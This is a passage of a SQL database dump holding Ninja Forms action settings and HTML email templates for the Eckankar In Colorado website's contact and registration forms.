end.'),(4807,162,'title','','title',''),(4808,162,'key','','key',''),(4809,162,'type','email','type','email'),(4810,162,'active','1','active','1'),(4811,162,'created_at','2018-01-03 11:42:46','created_at','2018-01-03 11:42:46'),(4812,162,'date_updated','2016-01-15','date_updated','2016-01-15'),(4813,162,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(4814,162,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(4815,162,'to','{field:email_23}','to','{field:email_23}'),(4816,162,'email_subject','Central Colorado Leadership Communications','email_subject','Central Colorado Leadership Communications'),(4817,162,'attach_csv','0','attach_csv','0'),(4818,162,'email_format','html','email_format','html'),(4819,162,'reply_to','','reply_to',''),(4820,162,'cc','','cc',''),(4821,162,'bcc','','bcc',''),(4822,162,'redirect_url','','redirect_url',''),(4823,162,'success_msg','','success_msg',''),(4824,162,'label','Send copy to user','label','Send copy to user'),(4825,162,'objectType','Action','objectType','Action'),(4826,162,'objectDomain','actions','objectDomain','actions'),(4827,162,'editActive','','editActive',''),(4828,162,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(4829,162,'payment_gateways','','payment_gateways',''),(4830,162,'payment_total','0','payment_total','0'),(4831,162,'tag','','tag',''),(4832,162,'email_message_plain','','email_message_plain',''),(4833,162,'parent_id','8','parent_id','8'),(4834,162,'email_message','  <style>    table, td, div, h1, p {font-family: Arial, sans-serif;}  </style>        <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;background:#ffffff;\">      <tbody>        <tr>          <td style=\"padding:0;\" align=\"center\">            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:left;\">              <tbody>                <tr>                  <td style=\"padding: 20px 0px; background: white none repeat scroll 0% 0%; font-size: 50px; line-height: 10px; font-weight: 600;\" align=\"center\"><span style=\"color: #4f759b;\"><img src=\"file:///D:/ECK%20WEBSITE/ECK%20COLORADO%20WORDPRESS/ECK%20WEBSITE%20WITH%20BOLDGRID--CURRENT%20WEBSITE/images/email%20images/email-img-registration-600-5b.png\" alt=\"\"><br>                    </span><span style=\"color: #666666;\"><br>                    </span></td>                </tr>                <tr>                  <td style=\"padding:36px 30px 42px 30px;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                      <tbody>                        <tr>                          <td style=\"padding:0 0 36px 0;color:#153643;\">                            <div style=\"text-align: center;\"><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                    <p style=\"font-size:23px;\"><strong>Hello                                        {field:textbox_142},</strong></p>                                    <p style=\"font-size:19px;\">Thanks for                                      getting in touch!</p>                                    <p>You have created a new form submission on                                      the Eckankar In Colorado website                                      requesting contact with a person on the                                      Loveland ECK Leadership Communications                                      team.</p>                                    <p>Here is a copy of the information that                                      you have submitted:</p>                                  </span></span></span><strong><strong></strong>                              </strong></div>                            <strong> </strong></td>                        </tr>                        <tr>                          <td style=\"padding:0;\">                            <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                              <tbody>                                <tr>                                  <td style=\"width:260px;padding:0;vertical-align:top;color:#153643;\">                                    <table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">                                      <tbody>                                        <tr>                                          <td style=\"background-color: #efefef;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left; \">                                            <p><span style=\"color: #333333\"><strong>FIRST                                                  NAME:</strong>                                                {field:textbox_142}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>LAST                                                  NAME:</strong>                                                {field:lastname_143}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>EMAIL:</strong>                                                {field:email_144}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong>                                                {field:phone_145}</span><br>                                              <br>                                              <span style=\"color: #333333\"><strong>LOCAL                                                  AREA:</strong>                                                {field:listselect_146}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>PERSON                                                  YOU WOULD LIKE TO CONTACT:</strong>{field:select_the_person_you_would_like_to_contact_1613166666321}</span></p>                                            <p><span style=\"color: #333333\"><strong>MESSAGE:                                                  </strong>{field:textarea_150}</span></p>                                          </td>                                        </tr>                                      </tbody>                                    </table>                                  </td>                                </tr>                              </tbody>                            </table>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>                <tr>                  <td style=\"padding:30px;background:#7393B3;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;font-size:9px;font-family:Arial,sans-serif;\">                      <tbody>                        <tr>                          <td style=\"padding:0;\" align=\"center\">                            <p style=\"margin:0;font-size:16px;line-height:22px;font-family:Arial,sans-serif;color:#ffffff;\">If                              you have any questions regarding the origin of                              this form, please feel free to contact the                              Eckankar In Colorado webmaster: <br>                              webmaster@eckankar-colorado.org<br>                              <br>                              <em>Your Eckankar in Colorado Team<br>                                <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><a href=\"http://www.example.com\" style=\"color:#ffffff;text-decoration:underline;\"></a>                            </p>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>              </tbody>            </table>          </td>        </tr>      </tbody>    </table>','email_message','  <style>    table, td, div, h1, p {font-family: Arial, sans-serif;}  </style>        <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;background:#ffffff;\">      <tbody>        <tr>          <td style=\"padding:0;\" align=\"center\">            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:left;\">              <tbody>                <tr>                  <td style=\"padding: 20px 0px; background: white none repeat scroll 0% 0%; font-size: 50px; line-height: 10px; font-weight: 600;\" align=\"center\"><span style=\"color: #4f759b;\"><img src=\"file:///D:/ECK%20WEBSITE/ECK%20COLORADO%20WORDPRESS/ECK%20WEBSITE%20WITH%20BOLDGRID--CURRENT%20WEBSITE/images/email%20images/email-img-registration-600-5b.png\" alt=\"\"><br>                    </span><span style=\"color: #666666;\"><br>                    </span></td>                </tr>                <tr>                  <td style=\"padding:36px 30px 42px 30px;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                      <tbody>                        <tr>                          <td style=\"padding:0 0 36px 0;color:#153643;\">                            <div style=\"text-align: center;\"><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                    <p style=\"font-size:23px;\"><strong>Hello                                        {field:textbox_142},</strong></p>                                    <p style=\"font-size:19px;\">Thanks for                                      getting in touch!</p>                                    <p>You have created a new form submission on                                      the Eckankar In Colorado website                                      requesting contact with a person on the                                      Loveland ECK Leadership Communications                                      team.</p>                                    <p>Here is a copy of the information that                                      you have submitted:</p>                                  </span></span></span><strong><strong></strong>                              </strong></div>                            <strong> </strong></td>                        </tr>                        <tr>                          <td style=\"padding:0;\">                            <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                              <tbody>                                <tr>                                  <td style=\"width:260px;padding:0;vertical-align:top;color:#153643;\">                                    <table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">                                      <tbody>                                        <tr>                                          <td style=\"background-color: #efefef;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left; \">                                            <p><span style=\"color: #333333\"><strong>FIRST                                                  NAME:</strong>                                                {field:textbox_142}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>LAST                                                  NAME:</strong>                                                {field:lastname_143}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>EMAIL:</strong>                                                {field:email_144}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong>                                                {field:phone_145}</span><br>                                              <br>                                              <span style=\"color: #333333\"><strong>LOCAL                                                  AREA:</strong>                                                {field:listselect_146}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>PERSON                                                  YOU WOULD LIKE TO CONTACT:</strong>{field:select_the_person_you_would_like_to_contact_1613166666321}</span></p>                                            <p><span style=\"color: #333333\"><strong>MESSAGE:                                                  </strong>{field:textarea_150}</span></p>                                          </td>                                        </tr>                                      </tbody>                                    </table>                                  </td>                                </tr>                              </tbody>                            </table>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>                <tr>                  <td style=\"padding:30px;background:#7393B3;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;font-size:9px;font-family:Arial,sans-serif;\">                      <tbody>                        <tr>                          <td style=\"padding:0;\" align=\"center\">                            <p style=\"margin:0;font-size:16px;line-height:22px;font-family:Arial,sans-serif;color:#ffffff;\">If                              you have any questions regarding the origin of                              this form, please feel free to contact the                              Eckankar In Colorado webmaster: <br>                              webmaster@eckankar-colorado.org<br>                              <br>                              <em>Your Eckankar in Colorado Team<br>                                <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><a href=\"http://www.example.com\" style=\"color:#ffffff;text-decoration:underline;\"></a>                            </p>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>              </tbody>            </table>          </td>        </tr>      </tbody>    </table>'),(4835,163,'subs_expire_time','90','subs_expire_time','90'),(4836,163,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4837,163,'submitter_email','','submitter_email',''),(4838,163,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(4839,163,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(4840,163,'set_subs_to_expire','0','set_subs_to_expire','0'),(4841,163,'title','','title',''),(4842,163,'key','','key',''),(4843,163,'type','successmessage','type','successmessage'),(4844,163,'active','1','active','1'),(4845,163,'created_at','2018-01-03 11:42:46','created_at','2018-01-03 11:42:46'),(4846,163,'date_updated','2016-01-15','date_updated','2016-01-15'),(4847,163,'from_name','','from_name',''),(4848,163,'from_address','','from_address',''),(4849,163,'to','{wp:admin_email}','to','{wp:admin_email}'),(4850,163,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(4851,163,'email_message','{fields_table}','email_message','{fields_table}'),(4852,163,'attach_csv','0','attach_csv','0'),(4853,163,'email_format','html','email_format','html'),(4854,163,'reply_to','','reply_to',''),(4855,163,'cc','','cc',''),(4856,163,'bcc','','bcc',''),(4857,163,'redirect_url','','redirect_url',''),(4858,163,'success_msg','<p><br></p>','success_msg','<p><br></p>'),(4859,163,'label','Success Message','label','Success Message'),(4860,163,'objectType','Action','objectType','Action'),(4861,163,'objectDomain','actions','objectDomain','actions'),(4862,163,'editActive','','editActive',''),(4863,163,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(4864,163,'payment_gateways','','payment_gateways',''),(4865,163,'payment_total','0','payment_total','0'),(4866,163,'tag','','tag',''),(4867,163,'email_message_plain','','email_message_plain',''),(4868,163,'parent_id','8','parent_id','8'),(4869,163,'drawerDisabled','','drawerDisabled',''),(4870,164,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4871,164,'title','','title',''),(4872,164,'key','','key',''),(4873,164,'type','email','type','email'),(4874,164,'active','1','active','1'),(4875,164,'created_at','2018-01-03 11:42:46','created_at','2018-01-03 11:42:46'),(4876,164,'date_updated','2016-01-19','date_updated','2016-01-19'),(4877,164,'from_name','Central Colorado Leadership Communications','from_name','Central Colorado Leadership Communications'),(4878,164,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(4879,164,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(4880,164,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(4881,164,'attach_csv','0','attach_csv','0'),(4882,164,'email_format','html','email_format','html'),(4883,164,'reply_to','','reply_to',''),(4884,164,'cc','','cc',''),(4885,164,'bcc','','bcc',''),(4886,164,'redirect_url','','redirect_url',''),(4887,164,'success_msg','','success_msg',''),(4888,164,'label','Admin Email','label','Admin Email'),(4889,164,'objectType','Action','objectType','Action'),(4890,164,'objectDomain','actions','objectDomain','actions'),(4891,164,'editActive','','editActive',''),(4892,164,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(4893,164,'payment_gateways','','payment_gateways',''),(4894,164,'payment_total','0','payment_total','0'),(4895,164,'tag','','tag',''),(4896,164,'email_message_plain','','email_message_plain',''),(4897,164,'drawerDisabled','','drawerDisabled',''),(4898,164,'parent_id','8','parent_id','8'),(4899,164,'email_message',' <style>    table, td, div, h1, p {font-family: Arial, sans-serif;}  </style>        <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;background:#ffffff;\">      <tbody>        <tr>          <td style=\"padding:0;\" align=\"center\">            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:left;\">              <tbody>                <tr>                  <td style=\"padding: 20px 0px; background: white none repeat scroll 0% 0%; font-size: 50px; line-height: 10px; font-weight: 600;\" align=\"center\"><span style=\"color: #4f759b;\">Admin                      Notification<br>                      <br>                    </span><span style=\"color: #666666;\"><br>                    </span></td>                </tr>                <tr>                  <td style=\"padding:36px 30px 42px 30px;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                      <tbody>                        <tr>                          <td style=\"padding:0 0 36px 0;color:#153643;\">                            <p style=\"font-size: 20px; margin: 0px 0px 20px; font-family: Arial,sans-serif; text-align: center;font-size:30px; color:#f28a27;\"><strong>New                                <strong><span id=\"nf-drawer-content\" style=\"color: #4f759b;\"><span></span></span></strong></strong></p>                            <strong><strong> </strong>                              <p style=\"color: #23507d;text-align:center;font-size:23px;\" class=\"nf-setting-groups\"><strong><span class=\"nf-field-settings\">{form:title}</span><span>                                  </span>Form Submission</strong></p>                            </strong>                            <div style=\"text-align: center;\"><strong> This form                                was generated from a user submission on the <em>Eckankar                                  In Colorado</em> website. You are receiving                                this submission because you are listed as a                                contact for the <em>Loveland ECK Leadership                                  organization</em>.</strong><br>                              <strong> <strong></strong></strong><br>                              <strong><strong> The following person has                                  requested contact with an ECK representative.                                  Here is the information that <span style=\"color: #666666\">{field:textbox_142}                                    {field:lastname_143}</span> has submitted:</strong>                              </strong></div>                            <strong>                              <p></p>                            </strong></td>                        </tr>                        <tr>                          <td style=\"padding:0;\">                            <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                              <tbody>                                <tr>                                  <td style=\"width:260px;padding:0;vertical-align:top;color:#153643;\">                                    <table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">                                      <tbody>                                        <tr>                                          <td style=\"background-color: #efefef;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left; \">                                            <p><span style=\"color: #333333\"><strong>FIRST                                                  NAME:</strong>                                                {field:textbox_142}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>LAST                                                  NAME:</strong>                                                {field:lastname_143}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>EMAIL:</strong>                                                {field:email_144}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong>                                                {field:phone_145}</span><br>                                              <br>                                              <span style=\"color: #333333\"><strong>LOCAL                                                  AREA:</strong>                                                {field:listselect_146}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>PERSON                                                  YOU WOULD LIKE TO CONTACT:</strong>{field:select_the_person_you_would_like_to_contact_1613166666321}</span></p>                                            <p><span style=\"color: #333333\"><strong>MESSAGE:                                                  </strong>{field:textarea_150}</span></p>                                          </td>                                        </tr>                                      </tbody>                                    </table>                                  </td>                                </tr>                              </tbody>                            </table>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>                <tr>                  <td style=\"padding:30px;background:#7393B3;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;font-size:9px;font-family:Arial,sans-serif;\">                      <tbody>                        <tr>                          <td style=\"padding:0;\" align=\"center\">                            <p style=\"margin:0;font-size:16px;line-height:22px;font-family:Arial,sans-serif;color:#ffffff;\">If                              you have any questions regarding the origin of                              this form, please feel free to contact the                              Eckankar In Colorado webmaster: <br>                              webmaster@eckankar-colorado.org<br>                              <br>                              <em>Your Eckankar in Colorado Team<br>                                <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><a href=\"http://www.example.com\" style=\"color:#ffffff;text-decoration:underline;\"></a>                            </p>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>              </tbody>            </table>          </td>        </tr>      </tbody>    </table>','email_message',' <style>    table, td, div, h1, p {font-family: Arial, sans-serif;}  </style>        <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;background:#ffffff;\">      <tbody>        <tr>          <td style=\"padding:0;\" align=\"center\">            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:left;\">              <tbody>                <tr>                  <td style=\"padding: 20px 0px; background: white none repeat scroll 0% 0%; font-size: 50px; line-height: 10px; font-weight: 600;\" align=\"center\"><span style=\"color: #4f759b;\">Admin                      Notification<br>                      <br>                    </span><span style=\"color: #666666;\"><br>                    </span></td>                </tr>                <tr>                  <td style=\"padding:36px 30px 42px 30px;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                      <tbody>                        <tr>                          <td style=\"padding:0 0 36px 0;color:#153643;\">                            <p style=\"font-size: 20px; margin: 0px 0px 20px; font-family: Arial,sans-serif; text-align: center;font-size:30px; color:#f28a27;\"><strong>New                                <strong><span id=\"nf-drawer-content\" style=\"color: #4f759b;\"><span></span></span></strong></strong></p>                            <strong><strong> </strong>                              <p style=\"color: #23507d;text-align:center;font-size:23px;\" class=\"nf-setting-groups\"><strong><span class=\"nf-field-settings\">{form:title}</span><span>                                  </span>Form Submission</strong></p>                            </strong>                            <div style=\"text-align: center;\"><strong> This form                                was generated from a user submission on the <em>Eckankar                                  In Colorado</em> website. You are receiving                                this submission because you are listed as a                                contact for the <em>Loveland ECK Leadership                                  organization</em>.</strong><br>                              <strong> <strong></strong></strong><br>                              <strong><strong> The following person has                                  requested contact with an ECK representative.                                  Here is the information that <span style=\"color: #666666\">{field:textbox_142}                                    {field:lastname_143}</span> has submitted:</strong>                              </strong></div>                            <strong>                              <p></p>                            </strong></td>                        </tr>                        <tr>                          <td style=\"padding:0;\">                            <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                              <tbody>                                <tr>                                  <td style=\"width:260px;padding:0;vertical-align:top;color:#153643;\">                                    <table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">                                      <tbody>                                        <tr>                                          <td style=\"background-color: #efefef;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left; \">                                            <p><span style=\"color: #333333\"><strong>FIRST                                                  NAME:</strong>                                                {field:textbox_142}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>LAST                                                  NAME:</strong>                                                {field:lastname_143}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>EMAIL:</strong>                                                {field:email_144}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong>                                                {field:phone_145}</span><br>                                              <br>                                              <span style=\"color: #333333\"><strong>LOCAL                                                  AREA:</strong>                                                {field:listselect_146}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>PERSON                                                  YOU WOULD LIKE TO CONTACT:</strong>{field:select_the_person_you_would_like_to_contact_1613166666321}</span></p>                                            <p><span style=\"color: #333333\"><strong>MESSAGE:                                                  </strong>{field:textarea_150}</span></p>                                          </td>                                        </tr>                                      </tbody>                                    </table>                                  </td>                                </tr>                              </tbody>                            </table>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>                <tr>                  <td style=\"padding:30px;background:#7393B3;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;font-size:9px;font-family:Arial,sans-serif;\">                      <tbody>                        <tr>                          <td style=\"padding:0;\" align=\"center\">                            <p style=\"margin:0;font-size:16px;line-height:22px;font-family:Arial,sans-serif;color:#ffffff;\">If                              you have any questions regarding the origin of                              this form, please feel free to contact the                              Eckankar In Colorado webmaster: <br>                              webmaster@eckankar-colorado.org<br>                              <br>                              <em>Your Eckankar in Colorado Team<br>                                <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><a href=\"http://www.example.com\" style=\"color:#ffffff;text-decoration:underline;\"></a>                            </p>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>              </tbody>            </table>          </td>        </tr>      </tbody>    </table>'),(4900,162,'drawerDisabled','','drawerDisabled',''),(4901,165,'objectType','Action','objectType','Action'),(4902,165,'objectDomain','actions','objectDomain','actions'),(4903,165,'editActive','','editActive',''),(4904,165,'to','{wp:admin_email}','to','{wp:admin_email}'),(4905,165,'reply_to','','reply_to',''),(4906,165,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(4907,165,'email_message','{fields_table}','email_message','{fields_table}'),(4908,165,'email_message_plain','','email_message_plain',''),(4909,165,'from_name','','from_name',''),(4910,165,'from_address','','from_address',''),(4911,165,'email_format','html','email_format','html'),(4912,165,'cc','','cc',''),(4913,165,'bcc','','bcc',''),(4914,165,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4915,165,'redirect_url','https://eckankar-colorado.org/thank-you-for-form-submission/','redirect_url','https://eckankar-colorado.org/thank-you-for-form-submission/'),(4916,165,'drawerDisabled','','drawerDisabled',''),(4917,166,'title','','title',''),(4918,166,'key','','key',''),(4919,166,'type','save','type','save'),(4920,166,'active','1','active','1'),(4921,166,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(4922,166,'label','Store Submission','label','Store Submission'),(4923,166,'objectType','Action','objectType','Action'),(4924,166,'objectDomain','actions','objectDomain','actions'),(4925,166,'editActive','','editActive',''),(4926,166,'order','3','order','3'),(4927,166,'payment_gateways','','payment_gateways',''),(4928,166,'payment_total','0','payment_total','0'),(4929,166,'tag','','tag',''),(4930,166,'to','{wp:admin_email}','to','{wp:admin_email}'),(4931,166,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(4932,166,'email_message','{fields_table}','email_message','{fields_table}'),(4933,166,'from_name','','from_name',''),(4934,166,'from_address','','from_address',''),(4935,166,'reply_to','','reply_to',''),(4936,166,'email_format','html','email_format','html'),(4937,166,'cc','','cc',''),(4938,166,'bcc','','bcc',''),(4939,166,'attach_csv','','attach_csv',''),(4940,166,'redirect_url','','redirect_url',''),(4941,166,'parent_id','42','parent_id','42'),(4942,166,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(4943,166,'email_message_plain','','email_message_plain',''),(4944,166,'submitter_email','','submitter_email',''),(4945,166,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(4946,166,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(4947,166,'set_subs_to_expire','0','set_subs_to_expire','0'),(4948,166,'subs_expire_time','90','subs_expire_time','90'),(4949,166,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),(4950,166,'drawerDisabled','','drawerDisabled',''),(4951,167,'title','','title',''),(4952,167,'key','','key',''),(4953,167,'type','email','type','email'),(4954,167,'active','1','active','1'),(4955,167,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(4956,167,'label','User Email Confirmation','label','User Email Confirmation'),(4957,167,'objectType','Action','objectType','Action'),(4958,167,'objectDomain','actions','objectDomain','actions'),(4959,167,'editActive','','editActive',''),(4960,167,'to','{field:email}','to','{field:email}'),(4961,167,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),(4962,167,'message','{all_fields_table}','message','{all_fields_table}'),(4963,167,'order','2','order','2'),(4964,167,'payment_gateways','','payment_gateways',''),(4965,167,'payment_total','0','payment_total','0'),(4966,167,'tag','','tag',''),(4967,167,'email_subject','Thank you for registering for our event','email_subject','Thank you for registering for our event'),(4968,167,'email_message','<p>Thanks bunches!</p><p>Your registration details are below:</p><p>{all_fields_table}<br></p>','email_message','<p>Thanks bunches!</p><p>Your registration details are below:</p><p>{all_fields_table}<br></p>'),(4969,167,'from_name','','from_name',''),(4970,167,'from_address','{system:admin_email}','from_address','{system:admin_email}'),(4971,167,'reply_to','','reply_to',''),(4972,167,'email_format','html','email_format','html'),(4973,167,'cc','','cc',''),(4974,167,'bcc','','bcc',''),(4975,167,'attach_csv','','attach_csv',''),(4976,167,'parent_id','42','parent_id','42'),(4977,167,'email_message_plain','','email_message_plain',''),(4978,167,'drawerDisabled','','drawerDisabled',''),(4979,168,'title','','title',''),(4980,168,'key','','key',''),(4981,168,'type','email','type','email'),(4982,168,'active','1','active','1'),(4983,168,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(4984,168,'label','Admin Email Notification','label','Admin Email Notification'),(4985,168,'objectType','Action','objectType','Action'),(4986,168,'objectDomain','actions','objectDomain','actions'),(4987,168,'editActive','','editActive',''),(4988,168,'to','{system:admin_email}','to','{system:admin_email}'),(4989,168,'subject','Ninja Forms Submission','subject','Ninja Forms 